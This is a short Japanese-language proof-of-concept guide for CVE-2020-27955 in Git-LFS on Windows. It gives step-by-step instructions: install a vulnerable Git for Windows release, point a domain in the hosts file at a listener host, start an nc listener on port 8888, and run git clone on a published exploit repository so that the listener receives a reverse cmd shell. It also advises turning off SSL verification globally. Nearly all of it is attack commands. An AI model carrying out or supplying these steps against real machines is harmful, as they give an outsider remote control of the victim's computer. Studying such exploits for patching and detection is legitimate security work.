
Git-LFS の CVE-2020-27955 に対する概念実証エクスプロイト。悪意のある git clone 操作を介してリモートコード実行を行い、リバースシェルを取得することを実証します。
1、Windowsマシンで脆弱性のあるバージョンのGit-LFSをダウンロード
ダウンロードURL:https://github.com/git-for-windows/git/releases/tag/v2.29.2.windows.1
2、Windowsマシンにインストールし、hostsファイルに以下の情報を追加します。10.1.1.5 は nc が 8888 ポートをリッスンするホストです(必要に応じて置き換えてください)
10.1.1.5 abcall.xyz
3、10.1.1.5 ホストで nc がポート 8888 をリッスンするように起動
┌──(root㉿hostname)-[~]
└─# nc
Cmd line: -l -p 8888
4、Windowsマシンの cmd コマンドラインで以下を入力
git clone https://github.com/z50913/CVE-2020-27955.git
5、10.1.1.5 が Windows マシンの cmd シェルを取得
SSL証明書の問題が発生した場合は、以下のコマンドを先に入力して SSL 検証を無効にしてから、再度 clone してください
git config --global http.sslverify false